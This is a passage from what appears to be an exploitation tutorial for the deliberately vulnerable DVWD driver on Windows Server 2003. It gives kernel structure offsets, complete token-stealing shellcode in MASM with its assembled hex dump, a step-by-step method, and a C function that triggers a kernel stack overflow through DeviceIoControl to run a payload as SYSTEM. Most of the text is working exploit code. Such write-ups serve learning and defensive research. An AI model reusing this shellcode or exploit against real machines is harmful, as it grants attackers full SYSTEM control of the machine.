  • _EPROCESS: the pointer to it is located at offset 0x38 from _KTHREAD.

  • ActiveProcessLinks: the doubly linked list that links the _EPROCESS structures of all processes is located at offset 0x98 from _EPROCESS. This is also the offset of the pointer to the next element (Flink).

  • _EPROCESS.UniqueProcessId: the PID of the process, at offset 0x94 from _EPROCESS.

  • _EPROCESS.Token: the reference to the access token, at offset 0xD8 in _EPROCESS. The value must be aligned on 8 bytes (its low 3 bits cleared) to obtain the token address.
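
The 8-byte alignment of the Token field is the same masking that appears in the debugger command `@@(0xe1001727 & ~7)` above. As a small sketch (the function names are hypothetical), the low three bits of the 32-bit _EX_FAST_REF value carry a reference count and the remaining bits carry the pointer:

```c
#include <stdint.h>

#define FAST_REF_MASK 0x7u  /* low 3 bits of a 32-bit _EX_FAST_REF */

/* Pointer part of the fast reference (low 3 bits cleared). */
uint32_t fast_ref_to_pointer(uint32_t value)
{
    return value & ~(uint32_t)FAST_REF_MASK;
}

/* Reference-count part of the fast reference (low 3 bits only). */
uint32_t fast_ref_count(uint32_t value)
{
    return value & FAST_REF_MASK;
}
```

Applied to the value from the dump, 0xe1001727 yields the token address 0xe1001720, which is what the `and edi, 0fffffff8h` instruction computes in the shellcode.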

#! c++
.486
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib

assume fs:nothing

.code

shellcode:

; ----------------------------------------------------------------------------
; Shellcode for Windows Server 2k3
; ----------------------------------------------------------------------------

; Offsets
WIN2K3_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PcrbData.CurrentThread
WIN2K3_EPROCESS_OFFSET  equ 038h    ; nt!_KTHREAD.ApcState.Process
WIN2K3_FLINK_OFFSET     equ 098h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
WIN2K3_PID_OFFSET       equ 094h    ; nt!_EPROCESS.UniqueProcessId
WIN2K3_TOKEN_OFFSET     equ 0d8h    ; nt!_EPROCESS.Token
WIN2K3_SYS_PID          equ 04h     ; PID Process SYSTEM

pushad                                  ; save registers

mov eax, fs:[WIN2K3_KTHREAD_OFFSET]     ; EAX <- current _KTHREAD
mov eax, [eax+WIN2K3_EPROCESS_OFFSET]   ; EAX <- current _KPROCESS == _EPROCESS
push eax

mov ebx, WIN2K3_SYS_PID

SearchProcessPidSystem:

mov eax, [eax+WIN2K3_FLINK_OFFSET]      ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WIN2K3_FLINK_OFFSET            ; EAX <- _EPROCESS of the next process
cmp [eax+WIN2K3_PID_OFFSET], ebx        ; UniqueProcessId == SYSTEM PID ?
jne SearchProcessPidSystem              ; if no, retry with the next process...

mov edi, [eax+WIN2K3_TOKEN_OFFSET]      ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h                     ; Must be aligned by 8

pop eax                                 ; EAX <- current _EPROCESS

mov ebx, 41414141h

SearchProcessPidToEscalate:

mov eax, [eax+WIN2K3_FLINK_OFFSET]      ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WIN2K3_FLINK_OFFSET            ; EAX <- _EPROCESS of the next process
cmp [eax+WIN2K3_PID_OFFSET], ebx        ; UniqueProcessId == PID of the process
                                        ; to escalate ?
jne SearchProcessPidToEscalate          ; if no, retry with the next process...

SwapTokens:

mov [eax+WIN2K3_TOKEN_OFFSET], edi      ; We replace the token of the process
                                        ; to escalate by the token of the process
                                        ; with SYSTEM PID

PartyIsOver:

popad                                   ; restore registers
mov edx, 11111111h                      ; EIP value after SYSEXIT
mov ecx, 22222222h                      ; ESP value after SYSEXIT
mov eax, 3Bh                            ; FS value in userland (points to _TEB)
db 8Eh, 0E0h                            ; mov fs, ax
db 0Fh, 35h                             ; SYSEXIT

end shellcode

; Hex dump of the assembled shellcode (Tools > Load Binary File as Hex):

00000200 :60 64 A1 24 01 00 00 8B - 40 38 50 BB 04 00 00 00
00000210 :8B 80 98 00 00 00 2D 98 - 00 00 00 39 98 94 00 00
00000220 :00 75 ED 8B B8 D8 00 00 - 00 83 E7 F8 58 BB 41 41
00000230 :41 41 8B 80 98 00 00 00 - 2D 98 00 00 00 39 98 94
00000240 :00 00 00 75 ED 89 B8 D8 - 00 00 00 61 BA 11 11 11
00000250 :11 B9 22 22 22 22 B8 3B - 00 00 00 8E E0 0F 35 00

Of course, before using this shellcode, we need to patch in the PID of the process whose privileges we want to escalate (in place of 41414141h), as well as the EIP and ESP values to use after SYSEXIT (in place of 11111111h and 22222222h). The exploit code does this before sending the buffer.
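
Replacing such a placeholder amounts to finding a 32-bit little-endian marker in a byte buffer and overwriting it in place. The generic C helper below is only a sketch of that idea: its name and signature are hypothetical, and it is not the routine used by DVWDExploit.

```c
#include <stddef.h>
#include <stdint.h>

/* Replaces the first little-endian occurrence of `placeholder` in buf with
 * `value`. Returns the offset of the patched dword, or -1 if not found. */
long patch_u32(uint8_t *buf, size_t len, uint32_t placeholder, uint32_t value)
{
    for (size_t i = 0; i + 4 <= len; i++) {
        uint32_t cur = (uint32_t)buf[i]
                     | ((uint32_t)buf[i + 1] << 8)
                     | ((uint32_t)buf[i + 2] << 16)
                     | ((uint32_t)buf[i + 3] << 24);
        if (cur == placeholder) {
            buf[i]     = (uint8_t)(value & 0xFFu);
            buf[i + 1] = (uint8_t)((value >> 8) & 0xFFu);
            buf[i + 2] = (uint8_t)((value >> 16) & 0xFFu);
            buf[i + 3] = (uint8_t)((value >> 24) & 0xFFu);
            return (long)i;
        }
    }
    return -1;
}
```

Searching for the marker rather than hard-coding its offset keeps the patching step valid if the byte sequence is edited, at the cost of assuming the marker value does not occur earlier in the buffer by accident.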

5. Exploitation methodology


The process is as follows:

  1. Create an executable memory area and put the previous shellcode (the one that swaps the tokens) into it.
  2. Likewise, create another executable memory area and put the second shellcode (the payload executed after the privilege escalation) into it.
  3. Update the first shellcode with the PID of the process to escalate, the EIP to use after SYSEXIT and the ESP to use after SYSEXIT. This method is taken from [4].
  4. Create an anonymous mapping for our buffer.
  5. Fill this mapping with the address of the first shellcode.
  6. Adjust the buffer pointer so that the last 4 bytes lie in an unmapped memory area.
  7. Send the buffer to the driver (using the DEVICEIO_DVWD_STACKOVERFLOW IOCTL).

6. Exploit code


This is the main function of the exploit. Given the previous explanations, it should be fairly straightforward:

#! c++
VOID TriggerOverflow32(VOID) {

    HANDLE hFile;
    DWORD dwReturn;
    UCHAR *map;
    UCHAR *uBuff = NULL;
    BOOL ret;
    ULONG_PTR pShellcode;

    // Load the Kernel Executive ntoskrnl.exe in userland and get some
    // symbol's kernel address
    if(LoadAndGetKernelBase() == FALSE)
        return;

    // Put the shellcodes in executable memory
    mapShellcodeSwapTokens = (UCHAR *)CreateUspaceExecMapping(1);
    mapShellcodePayload    = (UCHAR *)CreateUspaceExecMapping(1);

    memset(mapShellcodeSwapTokens, '\x00', GlobalInfo.dwAllocationGranularity);
    memset(mapShellcodePayload, '\x00', GlobalInfo.dwAllocationGranularity);

    RtlCopyMemory(mapShellcodeSwapTokens, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens));
    RtlCopyMemory(mapShellcodePayload, ShellcodePayload, sizeof(ShellcodePayload));

    // Added
    printf("[~] Update Shellcode with PID of the process... \n");
    if(!MajShellcodePid(L"DVWDExploit.exe")) {
        printf("[!]  An error occured, exitting... \n");
        return;
    }

    printf("[~] Update Shellcode with EIP to use after SYSEXIT... \n");
    if(!MajShellcodeEip()) {
        printf("[!]  An error occured, exitting... \n");
        return;
    }

    printf("[~] Update Shellcode with ESP to use after SYSEXIT... \n");
    if(!MajShellcodeEsp()) {
        printf("[!]  An error occured, exitting... \n");
        return;
    }

    printf("[~] Retrieve the address of the shellcode and build the buffer... \n");

    // Create an anonymous map
    map = (UCHAR *)CreateUspaceMapping(1);

    // Retrieve the address of the shellcode
    pShellcode = (ULONG_PTR)mapShellcodeSwapTokens;

    // We fill the map with the address of our shellcode (the address is repeated)
    FillMap(map, pShellcode, GlobalInfo.dwAllocationGranularity);

    // We adjust the pointer to the buffer (size = BUFF_SIZE) in such a way that the
    // last 4 bytes are in an unmapped memory area
    uBuff = map + GlobalInfo.dwAllocationGranularity - (BUFF_SIZE-sizeof(ULONG_PTR));

    // Now, we send our buffer to the driver and trigger the overflow
    hFile = CreateFile(_T("\\\\.\\DVWD"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
    deviceHandle = hFile;

    if(hFile != INVALID_HANDLE_VALUE)
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STACKOVERFLOW, uBuff, BUFF_SIZE, NULL, 0, &dwReturn, NULL);

    // If you get here the vulnerability has not been triggered ...
    printf("[!]  Stack overflow has not been triggered, maybe the driver has not been loaded ? \n");
    return;
}

7. Everything on your machine belongs to us


For the test, I used a payload taken from Metasploit (a shellcode that launches the calculator, calc.exe). But we could run anything else…

Our calc.exe runs with NT AUTHORITY\SYSTEM privileges, which means that the privilege escalation succeeded and the payload was executed.

References

[1] CreateFileMapping() function http://msdn.microsoft.com/en-us/library/aa366537(v=vs.85).aspx

[2] MapViewOfFileEx() function http://msdn.microsoft.com/en-us/library/aa366763(v=VS.85).aspx

[3] Remote Debugging using VMWare http://www.catch22.net/tuts/vmware

[4] Local Stack Overflow in Windows Kernel, by Heurs http://www.ghostsinthestack.org/article-29-local-stack-overflow-in-windows-kernel.html

[5] Exploiting Windows Device Drivers, by Piotr Bania http://pb.specialised.info/all/articles/ewdd.pdf